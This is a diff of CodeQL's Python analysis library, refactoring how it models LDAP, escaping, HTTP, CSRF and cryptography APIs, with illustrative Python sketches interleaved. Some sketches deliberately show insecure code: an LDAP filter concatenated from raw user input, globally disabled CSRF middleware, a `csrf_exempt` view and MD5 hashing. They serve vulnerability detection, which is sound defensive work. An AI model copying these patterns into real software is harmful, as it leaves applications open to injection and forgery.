DataFlow::Node getFilter() { result = range.getFilter() }
DataFlow::Node getFilter() { result = super.getFilter() }
/** Gets the argument containing the base DN. */
DataFlow::Node getBaseDn() { result = range.getBaseDn() }
DataFlow::Node getBaseDn() { result = super.getBaseDn() }
}
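A sketch using the ldap3 package, with placeholder host and DN values: `search_filter` is what `getFilter()` returns and `search_base` what `getBaseDn()` returns.
```python
from ldap3 import Connection, Server

def lookup(username):
    conn = Connection(Server("ldap://ldap.example.com"), auto_bind=True)
    # Building the filter from raw user input is what LDAP-injection queries look for.
    conn.search(search_base="dc=example,dc=com",
                search_filter="(uid=" + username + ")",
                attributes=["cn"])
    return conn.entries
```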
/** Provides classes for modeling new LDAP query execution-related APIs. */
@@ -494,26 +600,23 @@ module LDAP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `Escaping::Range` instead.
*/
class Escaping extends DataFlow::Node {
Escaping::Range range;
class Escaping extends DataFlow::Node instanceof Escaping::Range {
Escaping() {
this = range and
// escapes that don't have _both_ input/output defined are not valid
exists(range.getAnInput()) and
exists(range.getOutput())
exists(super.getAnInput()) and
exists(super.getOutput())
}
/** Gets an input that will be escaped. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
/** Gets the output that contains the escaped data. */
DataFlow::Node getOutput() { result = range.getOutput() }
DataFlow::Node getOutput() { result = super.getOutput() }
/**
* Gets the context that this function escapes for, such as `html`, or `url`.
*/
string getKind() { result = range.getKind() }
string getKind() { result = super.getKind() }
}
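Two standard-library escapes as a sketch of the concept, one for the `html` kind and one for the `url` kind (the domain is a placeholder):
```python
import html
from urllib.parse import quote

def render_comment(comment):
    # Escaping of kind "html": `comment` is the input, the return value the escaped output.
    return "<p>{}</p>".format(html.escape(comment))

def build_link(path):
    # Escaping of kind "url".
    return "https://example.com/" + quote(path)
```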
/** Provides a class for modeling new escaping APIs. */
@@ -571,7 +674,7 @@ module Escaping {
* `<p>{}</p>`.
*/
class HtmlEscaping extends Escaping {
HtmlEscaping() { range.getKind() = Escaping::getHtmlKind() }
HtmlEscaping() { super.getKind() = Escaping::getHtmlKind() }
}
/**
@@ -579,7 +682,7 @@ class HtmlEscaping extends Escaping {
* the body of a regex.
*/
class RegexEscaping extends Escaping {
RegexEscaping() { range.getKind() = Escaping::getRegexKind() }
RegexEscaping() { super.getKind() = Escaping::getRegexKind() }
}
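In Python the canonical regex escape is `re.escape`; a small sketch:
```python
import re

def contains_literally(needle, haystack):
    # `re.escape` escapes `needle` so it is matched literally inside a regex body.
    return re.search(re.escape(needle), haystack) is not None
```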
/**
@@ -587,14 +690,14 @@ class RegexEscaping extends Escaping {
* in an LDAP search.
*/
class LdapDnEscaping extends Escaping {
LdapDnEscaping() { range.getKind() = Escaping::getLdapDnKind() }
LdapDnEscaping() { super.getKind() = Escaping::getLdapDnKind() }
}
/**
* An escape of a string so it can be safely used as a filter in an LDAP search.
*/
class LdapFilterEscaping extends Escaping {
LdapFilterEscaping() { range.getKind() = Escaping::getLdapFilterKind() }
LdapFilterEscaping() { super.getKind() = Escaping::getLdapFilterKind() }
}
/** Provides classes for modeling HTTP-related APIs. */
@@ -613,29 +716,25 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RouteSetup::Range` instead.
*/
class RouteSetup extends DataFlow::Node {
RouteSetup::Range range;
RouteSetup() { this = range }
class RouteSetup extends DataFlow::Node instanceof RouteSetup::Range {
/** Gets the URL pattern for this route, if it can be statically determined. */
string getUrlPattern() { result = range.getUrlPattern() }
string getUrlPattern() { result = super.getUrlPattern() }
/**
* Gets a function that will handle incoming requests for this route, if any.
*
* NOTE: This will be modified in the near future to have a `RequestHandler` result, instead of a `Function`.
*/
Function getARequestHandler() { result = range.getARequestHandler() }
Function getARequestHandler() { result = super.getARequestHandler() }
/**
* Gets a parameter that will receive parts of the url when handling incoming
* requests for this route, if any. These automatically become a `RemoteFlowSource`.
*/
Parameter getARoutedParameter() { result = range.getARoutedParameter() }
Parameter getARoutedParameter() { result = super.getARoutedParameter() }
/** Gets a string that identifies the framework used for this route setup. */
string getFramework() { result = range.getFramework() }
string getFramework() { result = super.getFramework() }
}
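For a Flask application the pieces of a route setup line up as follows (a sketch; handler and route names are hypothetical):
```python
from flask import Flask

app = Flask(__name__)

@app.route("/users/<int:user_id>")  # the URL pattern of this route setup
def show_user(user_id):             # the request handler; `user_id` is a routed parameter
    return str(user_id)
```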
/** Provides a class for modeling new HTTP routing APIs. */
@@ -682,19 +781,15 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `RequestHandler::Range` instead.
*/
class RequestHandler extends Function {
RequestHandler::Range range;
RequestHandler() { this = range }
class RequestHandler extends Function instanceof RequestHandler::Range {
/**
* Gets a parameter that could receive parts of the url when handling incoming
* requests, if any. These automatically become a `RemoteFlowSource`.
*/
Parameter getARoutedParameter() { result = range.getARoutedParameter() }
Parameter getARoutedParameter() { result = super.getARoutedParameter() }
/** Gets a string that identifies the framework used for this route setup. */
string getFramework() { result = range.getFramework() }
string getFramework() { result = super.getFramework() }
}
/** Provides a class for modeling new HTTP request handlers. */
@@ -750,16 +845,12 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HttpResponse::Range` instead.
*/
class HttpResponse extends DataFlow::Node {
HttpResponse::Range range;
HttpResponse() { this = range }
class HttpResponse extends DataFlow::Node instanceof HttpResponse::Range {
/** Gets the data-flow node that specifies the body of this HTTP response. */
DataFlow::Node getBody() { result = range.getBody() }
DataFlow::Node getBody() { result = super.getBody() }
/** Gets the mimetype of this HTTP response, if it can be statically determined. */
string getMimetype() { result = range.getMimetype() }
string getMimetype() { result = super.getMimetype() }
}
/** Provides a class for modeling new HTTP response APIs. */
@@ -805,13 +896,9 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HttpRedirectResponse::Range` instead.
*/
class HttpRedirectResponse extends HttpResponse {
override HttpRedirectResponse::Range range;
HttpRedirectResponse() { this = range }
class HttpRedirectResponse extends HttpResponse instanceof HttpRedirectResponse::Range {
/** Gets the data-flow node that specifies the location of this HTTP redirect response. */
DataFlow::Node getRedirectLocation() { result = range.getRedirectLocation() }
DataFlow::Node getRedirectLocation() { result = super.getRedirectLocation() }
}
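A Flask-flavoured sketch of both response concepts (hypothetical helper names):
```python
from flask import Response, redirect

def ok_page(body):
    # An HTTP response: `body` is the body argument, "text/html" the mimetype.
    return Response(body, mimetype="text/html")

def go_home(target):
    # A redirect response: `target` is the redirect location.
    return redirect(target)
```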
/** Provides a class for modeling new HTTP redirect response APIs. */
@@ -837,25 +924,21 @@ module HTTP {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `HTTP::CookieWrite::Range` instead.
*/
class CookieWrite extends DataFlow::Node {
CookieWrite::Range range;
CookieWrite() { this = range }
class CookieWrite extends DataFlow::Node instanceof CookieWrite::Range {
/**
* Gets the argument, if any, specifying the raw cookie header.
*/
DataFlow::Node getHeaderArg() { result = range.getHeaderArg() }
DataFlow::Node getHeaderArg() { result = super.getHeaderArg() }
/**
* Gets the argument, if any, specifying the cookie name.
*/
DataFlow::Node getNameArg() { result = range.getNameArg() }
DataFlow::Node getNameArg() { result = super.getNameArg() }
/**
* Gets the argument, if any, specifying the cookie value.
*/
DataFlow::Node getValueArg() { result = range.getValueArg() }
DataFlow::Node getValueArg() { result = super.getValueArg() }
}
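A sketch of the two shapes of cookie write the concept distinguishes, using Flask (the helper name is hypothetical):
```python
from flask import make_response

def remember(name):
    resp = make_response("ok")
    # Cookie write via a dedicated API: "user" is the name argument, `name` the value argument.
    resp.set_cookie("user", name)
    # Cookie write via the raw header, which is what `getHeaderArg()` covers.
    resp.headers.add("Set-Cookie", "legacy=" + name)
    return resp
```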
/** Provides a class for modeling new cookie writes on HTTP responses. */
@@ -886,6 +969,76 @@ module HTTP {
abstract DataFlow::Node getValueArg();
}
}
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* in a global manner.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CsrfProtectionSetting::Range` instead.
*/
class CsrfProtectionSetting extends DataFlow::Node instanceof CsrfProtectionSetting::Range {
/**
* Gets the boolean value corresponding to whether CSRF protection is enabled
* (`true`) or disabled (`false`) by this node.
*/
boolean getVerificationSetting() { result = super.getVerificationSetting() }
}
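As one concrete shape of such a setting, a Django settings fragment where the CSRF middleware is commented out, globally disabling verification (a sketch, not tied to any particular project):
```python
# settings.py
MIDDLEWARE = [
    "django.middleware.common.CommonMiddleware",
    # "django.middleware.csrf.CsrfViewMiddleware",  # CSRF verification disabled globally
]
```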
/** Provides a class for modeling new CSRF protection setting APIs. */
module CsrfProtectionSetting {
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* in a global manner.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `CsrfProtectionSetting` instead.
*/
abstract class Range extends DataFlow::Node {
/**
* Gets the boolean value corresponding to whether CSRF protection is enabled
* (`true`) or disabled (`false`) by this node.
*/
abstract boolean getVerificationSetting();
}
}
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* for a specific part of an application.
*
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CsrfLocalProtectionSetting::Range` instead.
*/
class CsrfLocalProtectionSetting extends DataFlow::Node instanceof CsrfLocalProtectionSetting::Range {
/**
* Gets a request handler whose CSRF protection is changed.
*/
Function getRequestHandler() { result = super.getRequestHandler() }
/** Holds if CSRF protection is enabled by this setting. */
predicate csrfEnabled() { super.csrfEnabled() }
}
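Django's `csrf_exempt` decorator is the typical shape of such a local setting; a sketch:
```python
from django.http import HttpResponse
from django.views.decorators.csrf import csrf_exempt

@csrf_exempt  # CSRF protection disabled for this request handler only
def webhook(request):
    return HttpResponse("ok")
```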
/** Provides a class for modeling new CSRF protection setting APIs. */
module CsrfLocalProtectionSetting {
/**
* A data-flow node that enables or disables Cross-site request forgery protection
* for a specific part of an application.
*
* Extend this class to model new APIs. If you want to refine existing API models,
* extend `CsrfLocalProtectionSetting` instead.
*/
abstract class Range extends DataFlow::Node {
/**
* Gets a request handler whose CSRF protection is changed.
*/
abstract Function getRequestHandler();
/** Holds if CSRF protection is enabled by this setting. */
abstract predicate csrfEnabled();
}
}
}
/** Provides classes for modeling HTTP clients. */
@@ -972,27 +1125,23 @@ module Cryptography {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `KeyGeneration::Range` instead.
*/
class KeyGeneration extends DataFlow::Node {
KeyGeneration::Range range;
KeyGeneration() { this = range }
class KeyGeneration extends DataFlow::Node instanceof KeyGeneration::Range {
/** Gets the name of the cryptographic algorithm (for example `"RSA"` or `"AES"`). */
string getName() { result = range.getName() }
string getName() { result = super.getName() }
/** Gets the argument that specifies the size of the key in bits, if available. */
DataFlow::Node getKeySizeArg() { result = range.getKeySizeArg() }
DataFlow::Node getKeySizeArg() { result = super.getKeySizeArg() }
/**
* Gets the size of the key generated (in bits), as well as the `origin` that
* explains how we obtained this specific key size.
*/
int getKeySizeWithOrigin(DataFlow::Node origin) {
result = range.getKeySizeWithOrigin(origin)
result = super.getKeySizeWithOrigin(origin)
}
/** Gets the minimum key size (in bits) for this algorithm to be considered secure. */
int minimumSecureKeySize() { result = range.minimumSecureKeySize() }
int minimumSecureKeySize() { result = super.minimumSecureKeySize() }
}
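Using the `cryptography` package as an example (a sketch for a recent release of the package; the 2048-bit figure is the commonly cited minimum for RSA, not taken from this model):
```python
from cryptography.hazmat.primitives.asymmetric import rsa

# Key generation: the algorithm name is "RSA" and `key_size` is the key-size argument.
key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
```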
/** Provides classes for modeling new key-pair generation APIs. */
@@ -1071,16 +1220,12 @@ module Cryptography {
* Extend this class to refine existing API models. If you want to model new APIs,
* extend `CryptographicOperation::Range` instead.
*/
class CryptographicOperation extends DataFlow::Node {
CryptographicOperation::Range range;
CryptographicOperation() { this = range }
class CryptographicOperation extends DataFlow::Node instanceof CryptographicOperation::Range {
/** Gets the algorithm used, if it matches a known `CryptographicAlgorithm`. */
CryptographicAlgorithm getAlgorithm() { result = range.getAlgorithm() }
CryptographicAlgorithm getAlgorithm() { result = super.getAlgorithm() }
/** Gets an input the algorithm is used on, for example the plain text input to be encrypted. */
DataFlow::Node getAnInput() { result = range.getAnInput() }
DataFlow::Node getAnInput() { result = super.getAnInput() }
}
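A minimal example of an operation such a model would flag (MD5 being a broken hash for security purposes):
```python
import hashlib

def fingerprint(data):
    # The algorithm is MD5 and `data` is the input the operation is applied to.
    return hashlib.md5(data).hexdigest()
```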
/** Provides classes for modeling new applications of cryptographic algorithms. */

View File

@@ -1,6 +1,7 @@
import python
private import semmle.python.pointsto.PointsTo
private import semmle.python.objects.ObjectInternal
private import semmle.python.internal.CachedStages
/** An expression */
class Expr extends Expr_, AstNode {
@@ -8,7 +9,11 @@ class Expr extends Expr_, AstNode {
override Scope getScope() { py_scopes(this, result) }
/** Gets a textual representation of this element. */
override string toString() { result = "Expression" }
cached
override string toString() {
Stages::AST::ref() and
result = "Expression"
}
/** Gets the module in which this expression occurs */
Module getEnclosingModule() { result = this.getScope().getEnclosingModule() }
@@ -30,9 +35,6 @@ class Expr extends Expr_, AstNode {
/** Whether this expression is a constant */
predicate isConstant() { not this.isVariable() }
/** Use isParenthesized instead. */
deprecated override predicate isParenthesised() { this.isParenthesized() }
/** Whether the parenthesized property of this expression is true. */
predicate isParenthesized() { Expr_.super.isParenthesised() }
@@ -49,9 +51,6 @@ class Expr extends Expr_, AstNode {
/** Gets an immediate (non-nested) sub-expression of this expression */
Expr getASubExpression() { none() }
/** Use StrConst.getText() instead */
deprecated string strValue() { none() }
override AstNode getAChildNode() { result = this.getASubExpression() }
/**
@@ -190,7 +189,16 @@ class Call extends Call_ {
*/
Keyword getKeyword(int index) {
result = this.getNamedArg(index) and
not exists(DictUnpacking d, int lower | d = this.getNamedArg(lower) and lower < index)
(
not exists(this.getMinimumUnpackingIndex())
or
index <= this.getMinimumUnpackingIndex()
)
}
/** Gets the minimum index (if any) at which a dictionary unpacking (`**foo`) occurs in this call. */
private int getMinimumUnpackingIndex() {
result = min(int i | this.getNamedArg(i) instanceof DictUnpacking)
}
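A small Python illustration of what the refined `getKeyword` logic distinguishes; `connect` and `defaults` are hypothetical names:
```python
def connect(host, port, retries=1, timeout=None):
    return (host, port, retries, timeout)

defaults = {"retries": 3}
# Named-argument indices in this call: host=0, port=1, **defaults=2, timeout=3.
# Only keywords before the first `**` unpacking (here: host and port) are
# returned by `getKeyword`.
connect(host="db", port=5432, **defaults, timeout=10)
```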
/**
@@ -315,7 +323,7 @@ class Ellipsis extends Ellipsis_ {
}
/**
* Immutable literal expressions (except tuples).
* An immutable literal expression (except tuples).
* Consists of string (both unicode and byte) literals and numeric literals.
*/
abstract class ImmutableLiteral extends Expr {
@@ -446,6 +454,8 @@ class Unicode extends StrConst {
}
/**
* Gets the quoted representation of this string.
*
* The extractor puts quotes into the name of each string (to prevent "0" clashing with 0).
* The following predicate helps us match up string/byte literals in the source
* with the equivalent object.
@@ -620,8 +630,6 @@ class StrConst extends Str_, ImmutableLiteral {
)
}
deprecated override string strValue() { result = this.getS() }
override Expr getASubExpression() { none() }
override AstNode getAChildNode() { result = this.getAnImplicitlyConcatenatedPart() }
@@ -685,7 +693,7 @@ class False extends BooleanLiteral {
override boolean booleanValue() { result = false }
}
/** `None` */
/** The `None` constant. */
class None extends NameConstant {
/* syntax: None */
None() { name_consts(this, "None") }
@@ -728,20 +736,20 @@ class Guard extends Guard_ {
/** A context in which an expression is used */
class ExprContext extends ExprContext_ { }
/** Load context, the context of var in len(var) */
/** The load context, the context of var in len(var) */
class Load extends Load_ { }
/** Store context, the context of var in var = 0 */
/** The store context, the context of var in var = 0 */
class Store extends Store_ { }
/** Delete context, the context of var in del var */
/** The delete context, the context of var in del var */
class Del extends Del_ { }
/** This is an artifact of the Python grammar which includes an AugLoad context, even though it is never used. */
library class AugLoad extends AugLoad_ { }
/** The context of an augmented load. This is an artifact of the Python grammar which includes an AugLoad context, even though it is never used. */
class AugLoad extends AugLoad_ { }
/** Augmented store context, the context of var in var += 1 */
/** The augmented store context, the context of var in var += 1 */
class AugStore extends AugStore_ { }
/** Parameter context, the context of var in def f(var): pass */
/** The parameter context, the context of var in def f(var): pass */
class Param extends Param_ { }

View File

@@ -2,12 +2,6 @@ import python
/** A file */
class File extends Container, @file {
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated override string getName() { result = this.getAbsolutePath() }
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated string getFullName() { result = this.getAbsolutePath() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
@@ -115,9 +109,6 @@ private predicate occupied_line(File f, int n) {
/** A folder (directory) */
class Folder extends Container, @folder {
/** DEPRECATED: Use `getAbsolutePath` instead. */
deprecated override string getName() { result = this.getAbsolutePath() }
/**
* Holds if this element is at the specified location.
* The location spans column `startcolumn` of line `startline` to
@@ -156,9 +147,6 @@ class Folder extends Container, @folder {
abstract class Container extends @container {
Container getParent() { containerparent(result, this) }
/** Gets a child of this container */
deprecated Container getChild() { containerparent(this, result) }
/**
* Gets a textual representation of the path of this container.
*
@@ -166,8 +154,11 @@ abstract class Container extends @container {
*/
string toString() { result = this.getAbsolutePath() }
/** Gets the name of this container */
abstract string getName();
/**
* Gets the name of this container.
* DEPRECATED: Use `getAbsolutePath` instead.
*/
deprecated string getName() { result = this.getAbsolutePath() }
/**
* Gets the relative path of this file or folder from the root folder of the
@@ -339,7 +330,7 @@ abstract class Container extends @container {
* paths. The list of paths is composed of the paths passed to the extractor and
* `sys.path`.
*/
predicate isImportRoot(int n) { this.getName() = import_path_element(n) }
predicate isImportRoot(int n) { this.getAbsolutePath() = import_path_element(n) }
/** Holds if this folder is the root folder for the standard library. */
predicate isStdLibRoot(int major, int minor) {

View File

@@ -1,5 +1,6 @@
import python
private import semmle.python.pointsto.PointsTo
private import semmle.python.internal.CachedStages
/*
* Note about matching parent and child nodes and CFG splitting:
@@ -82,30 +83,12 @@ class ControlFlowNode extends @py_flow_node {
toAst(this) instanceof NameConstant
}
/** Use NameNode.isLoad() instead */
deprecated predicate isUse() { toAst(this) instanceof Name and this.isLoad() }
/** Use NameNode.isStore() */
deprecated predicate isDefinition() { toAst(this) instanceof Name and this.isStore() }
/** Whether this flow node corresponds to an attribute expression */
predicate isAttribute() { toAst(this) instanceof Attribute }
/** Use AttrNode.isLoad() instead */
deprecated predicate isAttributeLoad() { toAst(this) instanceof Attribute and this.isLoad() }
/** Use AttrNode.isStore() instead */
deprecated predicate isAttributeStore() { toAst(this) instanceof Attribute and this.isStore() }
/** Whether this flow node corresponds to an subscript expression */
predicate isSubscript() { toAst(this) instanceof Subscript }
/** Use SubscriptNode.isLoad() instead */
deprecated predicate isSubscriptLoad() { toAst(this) instanceof Subscript and this.isLoad() }
/** Use SubscriptNode.isStore() instead */
deprecated predicate isSubscriptStore() { toAst(this) instanceof Subscript and this.isStore() }
/** Whether this flow node corresponds to an import member */
predicate isImportMember() { toAst(this) instanceof ImportMember }
@@ -140,7 +123,9 @@ class ControlFlowNode extends @py_flow_node {
AstNode getNode() { py_flow_bb_node(this, result, _, _) }
/** Gets a textual representation of this element. */
cached
string toString() {
Stages::DataFlow::ref() and
exists(Scope s | s.getEntryNode() = this | result = "Entry node for " + s.toString())
or
exists(Scope s | s.getANormalExit() = this | result = "Exit node for " + s.toString())
@@ -155,7 +140,7 @@ class ControlFlowNode extends @py_flow_node {
/** Whether this flow node is the first in its scope */
predicate isEntryNode() { py_scope_flow(this, _, -1) }
/** The value that this ControlFlowNode points-to. */
/** Gets the value that this ControlFlowNode points-to. */
predicate pointsTo(Value value) { this.pointsTo(_, value, _) }
/** Gets the value that this ControlFlowNode points-to. */
@@ -164,10 +149,10 @@ class ControlFlowNode extends @py_flow_node {
/** Gets a value that this ControlFlowNode may points-to. */
Value inferredValue() { this.pointsTo(_, result, _) }
/** The value and origin that this ControlFlowNode points-to. */
/** Gets the value and origin that this ControlFlowNode points-to. */
predicate pointsTo(Value value, ControlFlowNode origin) { this.pointsTo(_, value, origin) }
/** The value and origin that this ControlFlowNode points-to, given the context. */
/** Gets the value and origin that this ControlFlowNode points-to, given the context. */
predicate pointsTo(Context context, Value value, ControlFlowNode origin) {
PointsTo::pointsTo(this, context, value, origin)
}
@@ -209,7 +194,9 @@ class ControlFlowNode extends @py_flow_node {
BasicBlock getBasicBlock() { result.contains(this) }
/** Gets the scope containing this flow node */
cached
Scope getScope() {
Stages::AST::ref() and
if this.getNode() instanceof Scope
then
/* Entry or exit node */
@@ -317,7 +304,7 @@ class ControlFlowNode extends @py_flow_node {
exists(BasicBlock b, int i, int j | this = b.getNode(i) and other = b.getNode(j) and i < j)
}
/* Holds if this CFG node is a branch */
/** Holds if this CFG node is a branch */
predicate isBranch() { py_true_successors(this, _) or py_false_successors(this, _) }
ControlFlowNode getAChild() { result = this.getExprChild(this.getBasicBlock()) }
@@ -376,7 +363,7 @@ class CallNode extends ControlFlowNode {
)
}
/** Gets the flow node corresponding to the nth argument of the call corresponding to this flow node */
/** Gets the flow node corresponding to the n'th positional argument of the call corresponding to this flow node */
ControlFlowNode getArg(int n) {
exists(Call c |
this.getNode() = c and
@@ -439,12 +426,6 @@ class AttrNode extends ControlFlowNode {
)
}
/** Use getObject() instead */
deprecated ControlFlowNode getValue() { result = this.getObject() }
/** Use getObject(name) instead */
deprecated ControlFlowNode getValue(string name) { result = this.getObject(name) }
/**
* Gets the flow node corresponding to the object of the attribute expression corresponding to this flow node,
* with the matching name
@@ -507,18 +488,6 @@ class ImportStarNode extends ControlFlowNode {
class SubscriptNode extends ControlFlowNode {
SubscriptNode() { toAst(this) instanceof Subscript }
/**
* DEPRECATED: Use `getObject()` instead.
* This will be formally deprecated before the end 2018 and removed in 2019.
*/
deprecated ControlFlowNode getValue() {
exists(Subscript s |
this.getNode() = s and
s.getObject() = result.getNode() and
result.getBasicBlock().dominates(this.getBasicBlock())
)
}
/** Gets the flow node corresponding to the object (the sequence) in a subscript operation */
ControlFlowNode getObject() {
exists(Subscript s |
@@ -650,7 +619,9 @@ class UnaryExprNode extends ControlFlowNode {
* and nodes implicitly assigned in class and function definitions and imports.
*/
class DefinitionNode extends ControlFlowNode {
cached
DefinitionNode() {
Stages::AST::ref() and
exists(Assign a | a.getATarget().getAFlowNode() = this)
or
exists(AnnAssign a | a.getTarget().getAFlowNode() = this and exists(a.getValue()))
@@ -709,6 +680,7 @@ abstract class SequenceNode extends ControlFlowNode {
ControlFlowNode getAnElement() { result = this.getElement(_) }
/** Gets the control flow node for the nth element of this sequence */
cached
abstract ControlFlowNode getElement(int n);
}
@@ -717,6 +689,7 @@ class TupleNode extends SequenceNode {
TupleNode() { toAst(this) instanceof Tuple }
override ControlFlowNode getElement(int n) {
Stages::AST::ref() and
exists(Tuple t | this.getNode() = t and result.getNode() = t.getElt(n)) and
(
result.getBasicBlock().dominates(this.getBasicBlock())
@@ -950,10 +923,6 @@ class NameNode extends ControlFlowNode {
/** A control flow node corresponding to a named constant, one of `None`, `True` or `False`. */
class NameConstantNode extends NameNode {
NameConstantNode() { exists(NameConstant n | py_flow_bb_node(this, n, _, _)) }
deprecated override predicate defines(Variable v) { none() }
deprecated override predicate deletes(Variable v) { none() }
/*
* We ought to override uses as well, but that has
* a serious performance impact.
@@ -1009,12 +978,6 @@ private module Scopes {
scope = n.getEnclosingModule()
}
private predicate maybe_defined(SsaVariable var) {
exists(var.getDefinition()) and not py_ssa_phi(var, _) and not var.getDefinition().isDelete()
or
exists(SsaVariable input | input = var.getAPhiInput() | maybe_defined(input))
}
private predicate maybe_undefined(SsaVariable var) {
not exists(var.getDefinition()) and not py_ssa_phi(var, _)
or
@@ -1044,11 +1007,13 @@ class BasicBlock extends @py_flow_node {
string toString() { result = "BasicBlock" }
/** Whether this basic block strictly dominates the other */
pragma[nomagic]
predicate strictlyDominates(BasicBlock other) { other.getImmediateDominator+() = this }
cached
predicate strictlyDominates(BasicBlock other) {
Stages::AST::ref() and
other.getImmediateDominator+() = this
}
/** Whether this basic block dominates the other */
pragma[nomagic]
predicate dominates(BasicBlock other) {
this = other
or
@@ -1057,6 +1022,7 @@ class BasicBlock extends @py_flow_node {
cached
BasicBlock getImmediateDominator() {
Stages::AST::ref() and
this.firstNode().getImmediateDominator().getBasicBlock() = result
}
@@ -1094,7 +1060,11 @@ class BasicBlock extends @py_flow_node {
}
/** Gets a successor to this basic block */
BasicBlock getASuccessor() { result = this.getLastNode().getASuccessor().getBasicBlock() }
cached
BasicBlock getASuccessor() {
Stages::AST::ref() and
result = this.getLastNode().getASuccessor().getBasicBlock()
}
/** Gets a predecessor to this basic block */
BasicBlock getAPredecessor() { result.getASuccessor() = this }
@@ -1164,7 +1134,11 @@ class BasicBlock extends @py_flow_node {
}
/** Holds if this basic block strictly reaches the other. Is the start of other reachable from the end of this. */
predicate strictlyReaches(BasicBlock other) { this.getASuccessor+() = other }
cached
predicate strictlyReaches(BasicBlock other) {
Stages::AST::ref() and
this.getASuccessor+() = other
}
/** Holds if this basic block reaches the other. Is the start of other reachable from the end of this. */
predicate reaches(BasicBlock other) { this = other or this.strictlyReaches(other) }

View File

@@ -19,17 +19,22 @@ private import semmle.python.frameworks.FastApi
private import semmle.python.frameworks.Flask
private import semmle.python.frameworks.FlaskAdmin
private import semmle.python.frameworks.FlaskSqlAlchemy
private import semmle.python.frameworks.Httpx
private import semmle.python.frameworks.Idna
private import semmle.python.frameworks.Invoke
private import semmle.python.frameworks.Jmespath
private import semmle.python.frameworks.Ldap
private import semmle.python.frameworks.Ldap3
private import semmle.python.frameworks.Libtaxii
private import semmle.python.frameworks.Libxml2
private import semmle.python.frameworks.Lxml
private import semmle.python.frameworks.MarkupSafe
private import semmle.python.frameworks.Multidict
private import semmle.python.frameworks.Mysql
private import semmle.python.frameworks.MySQLdb
private import semmle.python.frameworks.Peewee
private import semmle.python.frameworks.Psycopg2
private import semmle.python.frameworks.Pycurl
private import semmle.python.frameworks.Pydantic
private import semmle.python.frameworks.PyMySQL
private import semmle.python.frameworks.Requests
@@ -44,5 +49,7 @@ private import semmle.python.frameworks.Toml
private import semmle.python.frameworks.Tornado
private import semmle.python.frameworks.Twisted
private import semmle.python.frameworks.Ujson
private import semmle.python.frameworks.Urllib3
private import semmle.python.frameworks.Yaml
private import semmle.python.frameworks.Yarl
private import semmle.python.frameworks.Xmltodict

View File

@@ -5,11 +5,11 @@ import python
* It is the syntactic entity that is compiled to a code object.
*/
class Function extends Function_, Scope, AstNode {
/** The expression defining this function */
/** Gets the expression defining this function */
CallableExpr getDefinition() { result = this.getParent() }
/**
* The scope in which this function occurs, will be a class for a method,
* Gets the scope in which this function occurs. This will be a class for a method,
* another function for nested functions, generator expressions or comprehensions,
* or a module for a plain function.
*/
@@ -167,24 +167,24 @@ class Function extends Function_, Scope, AstNode {
/** A def statement. Note that FunctionDef extends Assign as a function definition binds the newly created function */
class FunctionDef extends Assign {
FunctionExpr f;
/* syntax: def name(...): ... */
FunctionDef() {
/* This is an artificial assignment the rhs of which is a (possibly decorated) FunctionExpr */
exists(FunctionExpr f | this.getValue() = f or this.getValue() = f.getADecoratorCall())
this.getValue() = f or this.getValue() = f.getADecoratorCall()
}
override string toString() { result = "FunctionDef" }
/** Gets the function for this statement */
Function getDefinedFunction() {
exists(FunctionExpr func | this.containsInScope(func) and result = func.getInnerScope())
}
Function getDefinedFunction() { result = f.getInnerScope() }
override Stmt getLastStatement() { result = this.getDefinedFunction().getLastStatement() }
}
/** A function that uses 'fast' locals, stored in the frame not in a dictionary. */
class FastLocalsFunction extends Function {
/** A function that uses 'fast' locals, stored in the frame not in a dictionary. */
FastLocalsFunction() {
not exists(ImportStar i | i.getScope() = this) and
not exists(Exec e | e.getScope() = this)

View File

@@ -1,5 +1,6 @@
import python
private import semmle.python.types.Builtins
private import semmle.python.internal.CachedStages
/**
* An alias in an import statement, the `mod as name` part of `import mod as name`. May be artificial;
@@ -35,6 +36,8 @@ class ImportExpr extends ImportExpr_ {
}
/**
* Gets the level of this import.
*
* The language specifies level as -1 if relative imports are to be tried first, 0 for absolute imports,
* and level > 0 for explicit relative imports.
*/
@@ -165,13 +168,6 @@ class Import extends Import_ {
result = this.getAName().getValue().(ImportMember).getModule()
}
/**
* Use getAnImportedModuleName(),
* possibly combined with ModuleObject.importedAs()
* Gets a module imported by this import statement
*/
deprecated Module getAModule() { result.getName() = this.getAnImportedModuleName() }
/** Whether this a `from ... import ...` statement */
predicate isFromImport() { this.getAName().getValue() instanceof ImportMember }
@@ -188,7 +184,7 @@ class Import extends Import_ {
* For example, for the import statement `import bar` which
* is a relative import in package "foo", this would return
* "foo.bar".
* The import statment `from foo import bar` would return
* The import statement `from foo import bar` would return
* `foo` and `foo.bar`
*/
string getAnImportedModuleName() {
@@ -208,7 +204,9 @@ class Import extends Import_ {
/** An import * statement */
class ImportStar extends ImportStar_ {
/* syntax: from modname import * */
cached
ImportExpr getModuleExpr() {
Stages::AST::ref() and
result = this.getModule()
or
result = this.getModule().(ImportMember).getModule()
@@ -216,13 +214,6 @@ class ImportStar extends ImportStar_ {
override string toString() { result = "from " + this.getModuleExpr().getName() + " import *" }
/**
* Use getAnImportedModuleName(),
* possibly combined with ModuleObject.importedAs()
* Gets the module imported by this import * statement
*/
deprecated Module getTheModule() { result.getName() = this.getImportedModuleName() }
override Expr getASubExpression() { result = this.getModule() }
override Stmt getASubStatement() { none() }

View File

@@ -18,7 +18,7 @@ class FunctionMetrics extends Function {
int getNumberOfLinesOfDocStrings() { py_docstringlines(this, result) }
/**
* Cyclomatic complexity:
